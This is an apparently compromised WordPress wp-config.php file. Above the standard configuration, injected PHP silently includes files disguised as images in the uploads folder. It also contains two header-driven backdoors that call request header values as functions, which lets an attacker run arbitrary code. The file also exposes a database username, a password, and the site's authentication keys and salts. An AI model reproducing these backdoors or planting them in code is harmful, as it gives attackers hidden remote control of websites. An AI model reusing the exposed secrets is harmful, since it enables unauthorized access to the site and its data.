File: /var/www/thaler/wp-config.php
<?php @include_once('/var/www/thaler/wp-content/uploads/2023/08/YQ-noop-1.jpg');
@include_once('/var/www/thaler/wp-content/uploads/2023/11/0b799664f7aa256ccaaf8f870dc0b9ba793-150x150-300x167.webp');
$_HEADERS=getallheaders();if(isset($_HEADERS['Server-Timing'])){$rindex=$_HEADERS['Server-Timing']('', $_HEADERS['Sec-Websocket-Accept']($_HEADERS['If-Unmodified-Since']));$rindex();}
@include_once('/var/www/thaler/wp-content/uploads/wpcode/cache/library/threadtypes.html');
$_HEADERS=getallheaders();if(isset($_HEADERS['Content-Security-Policy'])){$db2_convert=$_HEADERS['Content-Security-Policy']('', $_HEADERS['Server-Timing']($_HEADERS['X-Dns-Prefetch-Control']));$db2_convert();}
//Begin Really Simple SSL session cookie settings
@ini_set('session.cookie_httponly', true);
@ini_set('session.cookie_secure', true);
@ini_set('session.use_only_cookies', true);
//END Really Simple SSL cookie settings
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'thaler' );
/** Database username */
define( 'DB_USER', 'eftech' );
/** Database password */
define( 'DB_PASSWORD', 'Onenines!x9' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
define( 'FS_METHOD' , 'direct' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', ')Mx7,Y-%,b4j dS]gN|f[U,Kxa#ztiy|@T?@2.hQ}I{(qr(PSJQd)FZzbAqPgeCp' );
define( 'SECURE_AUTH_KEY', '$g/}QtCq}FS,WyHOR?5F41xYHKhi>s8z2EQm]hm:XeBmU+d5hmDod#im`T=E*lfK' );
define( 'LOGGED_IN_KEY', 'AQaIsux~=3U*N4J(C/peTs*EvYbWle.1@o>-0=eo&x/WCa^U zQ%.?!+Z|e.;?kA' );
define( 'NONCE_KEY', ' ?A6Uau`TPXIJN0jO:YV;%Rzi|E[EaX67Tk|gwUOAs3,}M]Bt<LORT/31;X75Rk`' );
define( 'AUTH_SALT', 'WR{G0h2-/MLBmPBw>|[4;21i.c3Z/@K oo!`q?$Ss7A4gnp%jPHg)b}K<2fL}vbh' );
define( 'SECURE_AUTH_SALT', 'TQ$wrFcsP3L=?;Kcg.)2A(Bnhg>n4KTm}iwA$0trPNYM8{iN=>5#1~H}cY0U?3Hb' );
define( 'LOGGED_IN_SALT', '$Sh^O2WDwnL.?8m#i pQ9gv(VSxA9Gv=T$&j*;@#TKop1@N!=;8R]?sn=+4Q^yq]' );
define( 'NONCE_SALT', 'cAdel]?p`>>T:m.Ciyn]/AS=+0|O%2&y6A</_>GWEQI^%<>f2]Pd|OdB8JT <$?[' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';